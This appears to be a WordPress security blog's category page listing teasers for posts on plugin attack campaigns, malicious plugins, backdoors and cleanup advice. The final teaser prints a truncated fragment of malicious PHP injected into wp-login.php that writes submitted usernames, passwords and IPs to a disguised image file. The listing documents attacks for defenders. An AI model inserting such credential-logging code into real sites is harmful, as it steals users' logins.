Plugins Under Attack: August 2019
John Castro This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below: Multi-Vector Attack in…
Browsing Category
WordPress Security
672 posts
Fake Human Verification Spam
Luke Leal We recently released an update to our Labs Knowledgebase for new plugins that had been targeted during the month of July 2019. One of these…
Dissecting the WordPress 5.2.3 Update
Marc-Alexandre Montpas Last week, WordPress released version 5.2.3 which was a security and maintenance update, and as such, contained many security fixes. Part of our day to…
How to Audit & Cleanup WordPress Plugins & Themes
Pilar Garcia In an interview with Smashing Magazine our CoFounder (now Head of Security Products at GoDaddy) Tony Perez was asked the following question. What Makes WordPress…
How Domain Expiration Can Potentially Disrupt Other Websites
A website owner recently reached out to us about a pop-up advertisement problem on their website which occurred any time someone clicked anywhere on the…
Lack of controls when using WordPress’ update_option() with user input data equals plugin nightmare
As mentioned in recent posts, WordPress’ update_option() function is used to update any option in the options database table. If the permission flow when using…
Malicious Plugin Used to Encrypt WordPress Posts
Krasimir Konov During a recent cleanup, we found an interesting malicious WordPress plugin, “WP Security”, that was being used to encrypt blog post content. The website owner…
Neapolitan Backdoor Injection
Ben Martin Most of us are familiar with Neapolitan ice cream: a flavour whose distinguishing characteristic is not one single flavour but several. Many also know it…
Reverse Hardening WordPress Config
Hardening is the process of securing a website or system against known security weaknesses or potential issues to reduce the attack surface. The more functions…
Plugins Under Attack: July 2019
A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites: Multi-Vector Attack…
Simple WP login stealer
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…